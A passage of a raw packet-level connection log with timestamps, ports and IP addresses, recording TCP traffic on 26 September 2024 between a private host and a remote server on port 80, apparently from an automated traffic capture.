Sep 26, 2024 18:27:06.035656929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035684109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035691977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035727024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035731077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035756111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035763025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035775900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035797119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035829067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035829067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035851002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035861969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035872936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035895109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035916090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035926104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035942078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035959959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035978079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035998106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.036015034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.036046982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.068840981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.068908930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.068934917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.068948030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.068968058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.068985939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.068996906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069021940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069058895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069062948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069087982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069096088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069108009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069128036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069150925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069164038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069174051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069194078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069219112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069228888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069269896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069272995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069272995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069303036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069327116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069338083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069364071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069372892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069385052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069422960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069426060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069456100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069478989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069490910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069503069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069540024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069547892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069575071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069607019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069608927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069633961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069642067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069655895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069691896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069694042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069725037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069749117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069773912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069778919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069814920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069829941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069849014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069870949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069883108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069895029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069915056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069936037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069948912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.069967031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.069984913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.070008993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.070049047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.085306883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.085366011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.085392952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.085402012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.085416079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.085453987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.085459948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.085486889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.085508108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.085520983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.085539103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.085556030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.085567951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.085607052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.122776031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122797966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122812986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122827053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122847080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122869968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122884035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122898102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122901917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.122914076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.122991085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123111010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123125076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123142958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123153925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123157978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123172998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123187065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123191118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123205900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123215914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123238087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123260021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123286963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123301029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123313904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123337984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123358965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123426914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123441935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123455048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123466015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123471022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123486042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123492002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123503923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123517990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123526096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123533010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123541117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123547077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123563051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123574018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123604059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123605967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123620033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123634100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123641014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123647928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123661995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123671055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123675108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123689890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123699903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123703957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123718023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123723984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123733044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123747110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123764038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123766899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123779058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123791933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123805046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123809099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123816967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123841047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.123960972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.123975992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.124000072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.124026060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.124118090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.124135017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.124155998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.124172926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125077009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125091076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125104904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125117064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125123978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125133991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125142097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125153065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125164986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125186920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125245094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125258923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125272036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125277996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125293970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125317097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125446081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125461102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125473976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125482082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125488043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125502110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125507116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125515938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125526905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125557899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125756025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125770092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125783920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125794888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125824928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125922918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125938892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125952959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.125972986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.125998974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.126099110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126112938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126126051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126135111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.126143932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126156092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126169920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.126178980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126192093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.126194000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126209974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126214981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.126224041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.126246929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.126279116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157299042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157356024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157407999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157418966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157418966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157516003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157522917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157550097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157582045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157604933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157605886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157634974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157639980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157671928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157694101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157722950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157726049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157757044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157776117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157790899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157814980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157826900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157835960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157860041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157903910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157917976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157917976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157933950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157949924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.157969952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.157979965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158020020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158031940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158072948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158088923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158106089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158122063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158140898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158164024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158171892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158196926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158206940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158236027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158257008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158276081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158292055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158308029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158320904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158340931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158370018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158370018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158406973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158433914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158440113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158453941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158473015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158499956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158508062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158520937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158545017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.158562899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.158598900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.174114943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174134970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174150944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174166918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174185038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.174195051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174210072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174228907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174232006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.174232006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.174246073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.174252987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.174287081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210263014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210299015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210333109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210350990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210354090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210400105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210403919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210439920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210448980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210474014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210489035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210525036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210555077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210556984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210591078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210591078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210599899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210623980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210634947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210673094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210674047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210709095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210722923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210758924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210758924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210793018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210803986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210829020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210834980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210864067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210887909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210897923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210912943 CEST	49730	80	192.168.2.4	185.215.113.37
